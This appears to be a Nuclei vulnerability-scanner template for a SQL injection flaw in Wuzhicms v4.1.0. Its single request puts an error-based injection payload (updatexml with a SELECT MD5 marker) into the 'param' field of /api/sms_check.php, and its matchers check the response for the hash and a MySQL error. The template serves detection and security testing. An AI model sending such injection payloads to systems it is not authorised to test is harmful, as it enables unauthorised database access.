id: wuzhicms-sqli info: name: Wuzhicms v4.1.0 SQL Injection author: princechaddha severity: high reference: https://github.com/wuzhicms/wuzhicms/issues/184 tags: wuzhicms,sqli requests: - method: GET path: - "{{BaseURL}}/api/sms_check.php?param=1%27%20and%20updatexml(1,concat(0x7e,(SELECT%20MD5(1234)),0x7e),1)--%20" matchers-condition: and matchers: - type: status status: - 200 - type: word words: - "81dc9bdb52d04dc20036dbd8313ed05" - "sql_error:MySQL Query Error" part: body condition: and